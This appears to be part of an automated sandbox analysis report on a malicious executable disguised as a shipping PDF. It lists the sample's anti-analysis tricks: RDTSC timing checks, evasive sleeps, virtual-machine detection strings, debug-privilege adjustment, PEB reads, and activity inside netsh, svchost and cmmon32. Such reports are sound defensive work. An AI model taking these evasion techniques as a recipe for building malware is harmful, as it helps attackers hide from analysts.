Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000BD8604 second address: 0000000000BD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002B28604 second address: 0000000002B2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000BD899E second address: 0000000000BD89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002B2899E second address: 0000000002B289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000D68604 second address: 0000000000D6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000D6899E second address: 0000000000D689A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 4472	Thread sleep time: -35000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2940	Thread sleep time: -34000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\netsh.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_004088D0 rdtsc

11_2_004088D0

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 0000000D.00000000.342756318.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.298968913.00000000007C2000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}""
Source: explorer.exe, 0000000D.00000000.325727798.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000D.00000000.329523937.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: Nyedvqj.exe, 0000000E.00000002.341331996.00000000006DB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 0000000D.00000000.343112682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000000D.00000000.313224825.000000000DCB9000.00000004.00000001.sdmp	Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Code function: 11_2_004088D0 rdtsc

11_2_004088D0

Enables debug privileges

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug	Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	11_2_00BBF0BF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	11_2_00C1B8D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC90AF mov eax, dword ptr fs:[00000030h]	11_2_00BC90AF
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89080 mov eax, dword ptr fs:[00000030h]	11_2_00B89080
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]	11_2_00C03884
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C03884 mov eax, dword ptr fs:[00000030h]	11_2_00C03884
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B858EC mov eax, dword ptr fs:[00000030h]	11_2_00B858EC
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B02A mov eax, dword ptr fs:[00000030h]	11_2_00B9B02A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB002D mov eax, dword ptr fs:[00000030h]	11_2_00BB002D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C51074 mov eax, dword ptr fs:[00000030h]	11_2_00C51074
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C42073 mov eax, dword ptr fs:[00000030h]	11_2_00C42073
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]	11_2_00C54015
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C54015 mov eax, dword ptr fs:[00000030h]	11_2_00C54015
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C07016 mov eax, dword ptr fs:[00000030h]	11_2_00C07016
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]	11_2_00BA0050
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA0050 mov eax, dword ptr fs:[00000030h]	11_2_00BA0050
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB61A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	11_2_00BB61A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C141E8 mov eax, dword ptr fs:[00000030h]	11_2_00C141E8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2990 mov eax, dword ptr fs:[00000030h]	11_2_00BB2990
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAC182 mov eax, dword ptr fs:[00000030h]	11_2_00BAC182
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBA185 mov eax, dword ptr fs:[00000030h]	11_2_00BBA185
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	11_2_00B8B1E1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C069A6 mov eax, dword ptr fs:[00000030h]	11_2_00C069A6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C051BE mov eax, dword ptr fs:[00000030h]	11_2_00C051BE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]	11_2_00BB513A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB513A mov eax, dword ptr fs:[00000030h]	11_2_00BB513A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov eax, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120 mov ecx, dword ptr fs:[00000030h]	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89100 mov eax, dword ptr fs:[00000030h]	11_2_00B89100
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]	11_2_00B8B171
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8B171 mov eax, dword ptr fs:[00000030h]	11_2_00B8B171
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8C962 mov eax, dword ptr fs:[00000030h]	11_2_00B8C962
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]	11_2_00BAB944
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BAB944 mov eax, dword ptr fs:[00000030h]	11_2_00BAB944
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	11_2_00B9AAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	11_2_00B9AAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]	11_2_00BBFAB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B852A5 mov eax, dword ptr fs:[00000030h]	11_2_00B852A5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]	11_2_00BBD294
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBD294 mov eax, dword ptr fs:[00000030h]	11_2_00BBD294
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]	11_2_00BB2AE4
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2ACB mov eax, dword ptr fs:[00000030h]	11_2_00BB2ACB
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	11_2_00BC4A2C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC4A2C mov eax, dword ptr fs:[00000030h]	11_2_00BC4A2C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C14257 mov eax, dword ptr fs:[00000030h]	11_2_00C14257
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]	11_2_00C3B260
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3B260 mov eax, dword ptr fs:[00000030h]	11_2_00C3B260
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA3A1C mov eax, dword ptr fs:[00000030h]	11_2_00BA3A1C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58A62 mov eax, dword ptr fs:[00000030h]	11_2_00C58A62
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov ecx, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B85210 mov eax, dword ptr fs:[00000030h]	11_2_00B85210
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	11_2_00B8AA16
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8AA16 mov eax, dword ptr fs:[00000030h]	11_2_00B8AA16
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B98A0A mov eax, dword ptr fs:[00000030h]	11_2_00B98A0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC927A mov eax, dword ptr fs:[00000030h]	11_2_00BC927A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B89240 mov eax, dword ptr fs:[00000030h]	11_2_00B89240
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]	11_2_00C053CA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C053CA mov eax, dword ptr fs:[00000030h]	11_2_00C053CA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB4BAD mov eax, dword ptr fs:[00000030h]	11_2_00BB4BAD
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBB390 mov eax, dword ptr fs:[00000030h]	11_2_00BBB390
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB2397 mov eax, dword ptr fs:[00000030h]	11_2_00BB2397
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]	11_2_00B91B8F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B91B8F mov eax, dword ptr fs:[00000030h]	11_2_00B91B8F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C3D380 mov ecx, dword ptr fs:[00000030h]	11_2_00C3D380
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C4138A mov eax, dword ptr fs:[00000030h]	11_2_00C4138A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BADBE9 mov eax, dword ptr fs:[00000030h]	11_2_00BADBE9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB03E2 mov eax, dword ptr fs:[00000030h]	11_2_00BB03E2
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C55BA5 mov eax, dword ptr fs:[00000030h]	11_2_00C55BA5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58B58 mov eax, dword ptr fs:[00000030h]	11_2_00C58B58
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	11_2_00BB3B7A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB3B7A mov eax, dword ptr fs:[00000030h]	11_2_00BB3B7A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]	11_2_00B8DB60
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C4131B mov eax, dword ptr fs:[00000030h]	11_2_00C4131B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8F358 mov eax, dword ptr fs:[00000030h]	11_2_00B8F358
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8DB40 mov eax, dword ptr fs:[00000030h]	11_2_00B8DB40
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C58CD6 mov eax, dword ptr fs:[00000030h]	11_2_00C58CD6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9849B mov eax, dword ptr fs:[00000030h]	11_2_00B9849B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
